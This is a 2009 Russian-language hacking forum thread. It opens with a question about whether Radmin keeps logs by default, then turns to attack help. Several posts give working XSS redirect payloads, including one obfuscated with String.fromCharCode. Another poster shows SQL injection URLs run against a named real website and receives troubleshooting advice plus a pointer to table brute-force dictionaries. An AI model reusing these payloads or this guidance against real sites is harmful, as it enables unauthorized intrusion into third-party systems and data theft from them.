 |
|
15.09.2009, 12:18
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
Всё обыскал, всех опросил, ну никто не знает хранит ли Радмин логи по умАлчанию(( так что ничем помочь наверно не смогу.
Но вот мануаль,который так трудно было найти на сайте производителя Радмин, и в гугле его вобще нет на первом месте в странице результатов
(ССылка на мануаль, ВЫ ТОЛЬКО ПРЕДСТАВЬТЕ!!!!!!! на ВТОРОМ МЕСТЕ!!ААА..какой ужас) предложил вариант со словом умОлчание, хотя это конечно бред скорее всего, но может и что-то полезное будет.
Для тех,кто не хочет тратить свое время, я подчеркиваю, для ДОЛБО..ой, то есть для Exploit, привожу фрагмент мануала:
Протоколирование
Все действия программы могут заноситься в протокол (лог-файл). Чтобы включить
протоколирование, запустите «Настройки Remote Administrator server» (Settings for Remote
Administrator server) из группы Radmin в меню «Пуск». Нажмите кнопку «Опции…» (Options).
Включите опцию «Вести протокол» (Use logfile) и сохраните изменения нажатием кнопки
«OK».
В среде Windows NT 4.0/2000/XP/2003 возможно внесение записей не только в собственный
лог-файл, но и в журнал событий (Event Log).
|
|
|
15.09.2009, 13:58
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
Нет, по дефолту не хранит.
|
|
|
|
15.09.2009, 21:08
|
|
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
С нами:
9963746
Репутация:
180
|
|
Возможноли через конструкцию выполнения скрипта javascript:.... (например javascript=alert()) сделать код для редиректа ? Например с использованием eval - javascript:eval("злой_код")
И как это можно сделать. А если низя, то почему ?
|
|
|
|
15.09.2009, 21:12
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
<img src=. onerror=eval("document.location.href='http://google.com/';")>
<img src=. onerror=eval(String.fromCharCode(100,111,99,117,10 9,101,110,116,46,108,111,99,97,116,105,111,110,46, 104,114,101,102,61,39,104,116,116,112,58,47,47,103 ,111,111,103,108,101,46,99,111,109,47,39,59))>
Думаю понятно.
например javascript=alert()
вместо "=" должно быть ":", хотя подозреваю, что просто опечатка) |
|
|
|
15.09.2009, 21:20
|
|
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
С нами:
9963746
Репутация:
180
|
|
Сообщение от BlackSun
<img src=. onerror=eval("document.location.href='http://google.com/';")>
<img src=. onerror=eval(String.fromCharCode(100,111,99,117,10 9,101,110,116,46,108,111,99,97,116,105,111,110,46, 104,114,101,102,61,39,104,116,116,112,58,47,47,103 ,111,111,103,108,101,46,99,111,109,47,39,59))>
Думаю понятно.
вместо "=" должно быть ":", хотя подозреваю, что просто опечатка) Понятно, но я не это имел ввиду. Нужно чтото вроде
<img src="javascript :ЗЛОЙ_КОД_ДЛЯ_РЕДИР КТА">
спросите почему так - потомучто что я не слова неговорил про img вообще, а если тег не img и нету в теге параметров типа onerror... А есть проста возможность вставить куданибуть конструкцию javascript :...
вот в чем вся соль (с) ...
|
|
|
|
15.09.2009, 21:25
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
src=javscript:eval("document.location.href='http://google.com/';")
src=javscript:eval(String.fromCharCode(100,111,99, 117,10 9,101,110,116,46,108,111,99,97,116,105,111,110,46, 104,114,101,102,61,39,104,116,116,112,58,47,47,103 ,111,111,103,108,101,46,99,111,109,47,39,59))
Не вижу никакой разницы.
|
|
|
|
15.09.2009, 21:25
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Не могу понять, в
Код HTML:
http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
все норм показывает, видимые поля есть, все дела.
Как только ввожу
Код HTML:
http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables--
показывает ошибку, что за беда подскажите плз. |
|
|
|
15.09.2009, 21:29
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
Gemini12, коментарий "--" требует пробел в конце.
Во вторых версия мускула 4я, в ней нет information_schema.
|
|
|
|
15.09.2009, 21:35
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
2BlackSun
Не мог бы скинуть ссылочку на список таблиц 4 мускули если не затруднит. Очень надо плз.
|
|
|
|
15.09.2009, 21:37
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
2 Gemini12:
такого списка нет. Есть словари для брута - таблиц и колонок. Имеются в комплекте у SIPT4. У всех разные. У кого больше, у кого меньше
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
